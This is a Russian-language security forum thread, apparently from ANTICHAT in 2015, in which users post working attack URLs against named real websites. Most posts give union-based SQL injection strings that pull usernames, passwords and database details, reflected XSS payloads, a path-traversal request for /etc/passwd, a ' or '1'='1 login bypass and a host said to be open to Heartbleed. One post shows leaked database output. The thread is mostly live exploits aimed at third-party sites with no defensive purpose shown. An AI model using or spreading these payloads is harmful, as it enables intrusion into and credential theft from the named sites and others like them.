HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 29.07.2015, 11:34
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS-reflected:

Код:
Code:
http://sonnik.orakul.ua/freyd/ch%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%281%29%22%3E/
 
Ответить с цитированием

  #132  
Старый 04.08.2015, 22:47
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://tstu.ru

type: AFD

Код:
Code:
http://tstu.ru/video/download_img.php?url=/etc/passwd


исправил
 
Ответить с цитированием

  #133  
Старый 06.08.2015, 23:34
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

SQL-inj (Blind):

Код:
Code:
http://www.isihac.net/news-article.php?id=-47%27+union+select+1,2,3,4,password,6,7,8+from+users+limit+0,1+--+
 
Ответить с цитированием

  #134  
Старый 07.08.2015, 00:24
private_static
Guest
Сообщений: n/a
Провел на форуме:
25535

Репутация: 22
По умолчанию

XSS

Код:
Code:
http://www.kadrovik.ru/prc.php?year=2015">alert("xss");
SQL inject

Код:
Code:
http://orgpoisk.ru/region/id/-8%20union%20select%201,DATABASE%28%29,CURRENT_USER%28%29,4,5,6,7
user:huntfishru_orpsk@localhost

db:huntfishru_orpsk
 
Ответить с цитированием

  #135  
Старый 07.08.2015, 10:08
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

SQL inject

Код:
Code:
http://www.bookpourghaz.ir/post.php?id=-suHWoFO3ScI_EQUALS_'+union+select+1,2,3,user(),5,6,7,8+--+
Код:
Code:
http://www.seroqadir.com/read.php?id=-2323'+union+select+1,2,3,user(),5,6+--+
SQL inject

Код:
Code:
http://library.phcsuphan.ac.th/webpage.contentread.php?id=-6'+union+select+1,user(),3,4,5+--+
Код:
Code:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),5,6,7,8,9+--+
Код:
Code:
http://www.100devok.ru/view_post.php?id=-125'+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14+--+
 
Ответить с цитированием

  #136  
Старый 10.08.2015, 17:21
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:http://www.newpushkino.ru/

type:XSS Reflected

Строка поиска


Код:
Code:
alert('XSS');
 
Ответить с цитированием

  #137  
Старый 12.08.2015, 15:09
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

Site: http://www.hungatecottages.co.uk

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.hungatecottages.co.uk/blog-post.php?id=-55'+union+select+1,username,3,4,5,password,7,8,9+from+adminusers+limit+0,1+--+
Site: http://www.brandnmc.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.brandnmc.com/view-product.php?id=-45'+union+select+1,2,version(),4,5,6,7,8+--+
Site: http://agrovolyn.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
Site: http://www.siempreenplay.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
Site: http://www.fivestarhomefoods.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.fivestarhomefoods.com/view_product.php?id=-18'+union+select+1,column_name+from+information_schema.columns+where+table_name=%27users%27+limit+03,1+--+
 
Ответить с цитированием

  #138  
Старый 13.08.2015, 01:36
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:http://www.goravia.ru/

type:XSS Reflected

http://www.goravia.ru/authorization/

POST:

Код:
Code:
pass=adm&backurl=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E&member=1&user=adm
target:https://www.aviba.ru/

type:XSS Reflected

https://www.aviba.ru/

POST:

Код:
Code:
locate_start=1&tudaobratno=%3E%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2fscript%3E&polet_class=E&f_from=%D0%9E%D1%82%D0%BA%D1%83%D0%B4%D0%B0&f_to=%D0%9A%D1%83%D0%B4%D0%B0&f_date2=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%BE&f_date1=%D0%94%D0%B0%D1%82%D0%B0

 
Ответить с цитированием

  #139  
Старый 13.08.2015, 11:06
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

Heartbleed:

Код:
Code:
https://avon-ekb.ru
 
Ответить с цитированием

  #140  
Старый 13.08.2015, 14:27
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target:http://www.tez-tour.com/

type:XSS Reflected

Код:
Code:
http://www.tez-tour.com/captcha/index.htm?hotelTypeBetter=1&ref=%22%3E%3Cscript%3Ealert%28%27hello,tez%27%29%3B%3C%2Fscript%3E&regionId=
[COLOR="rgb(255, 153, 153)"]target:[/COLOR]http://www.pstour.ru

[COLOR="rgb(255, 153, 153)"]type:[/COLOR]SQL Injection


Код:
Code:
login:admin  password:' or '1'='1
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ